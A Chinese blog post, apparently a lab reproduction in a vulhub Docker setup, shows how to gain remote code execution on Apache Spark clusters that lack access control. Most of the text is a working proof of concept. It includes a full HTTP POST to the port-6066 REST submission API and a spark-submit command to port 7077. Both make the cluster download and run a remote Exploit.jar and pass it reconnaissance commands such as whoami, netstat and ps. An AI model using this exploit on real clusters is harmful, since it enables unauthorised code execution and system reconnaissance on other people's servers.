Apache Spark是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。如果管理节点未启动ACL(访问控制),我们将可以在集群中执行任意代码。
本次复现使用docker+vulhub一键搭建:
docker-compose up -d
环境启动后,会自动启用四个端口:8080,8081,6066,7077
他们分别为:
master的管理页面:http://your-ip:8080
slave的管理页面:http://your-ip:8081
standalone模式下,master将在6066端口启动一个HTTP服务器:
7077
1. 用REST API方式提交应用复现
POC:
POST /v1/submissions/create HTTP/1.1
Host: 192.168.109.140:6066
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
x-forwarded-for: 1.1.1.1'
Connection: close
Content-Length: 676
{
"action": "CreateSubmissionRequest",
"clientSparkVersion": "2.3.1",
"appArgs": [
"whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf"
],
"appResource": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar",
"environmentVariables": {
"SPARK_ENV_LOADED": "1"
},
"mainClass": "Exploit",
"sparkProperties": {
"spark.jars": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar",
"spark.driver.supervise": "false",
"spark.app.name": "Exploit",
"spark.eventLog.enabled": "true",
"spark.submit.deployMode": "cluster",
"spark.master": "spark://your-ip:6066"
}
}
# 其中,spark.jars即是编译好的应用,mainClass是待运行的类,appArgs是传给应用的参数。
得到返回值:“submissionId” : “driver-20201127154432-0000”
根据返回值访问:
http://your-ip:8081/logPage/?driverId=driver-20201127154432-0000&logType=stdout
注意,提交应用是在master中,查看结果是在具体执行这个应用的slave里(默认8081端口)。实战中,由于slave可能有多个。如果6066端口不能访问,或做了权限控制,我们可以向Spark standalone集群的master节点来提交应用,默认端口是7077,具体方法是利用Apache Spark自带的脚本
bin/spark-submit:
bin/spark-submit --master spark://111.111.111.111:7077 --deploy-mode cluster --class Exploit https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar id
5291
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
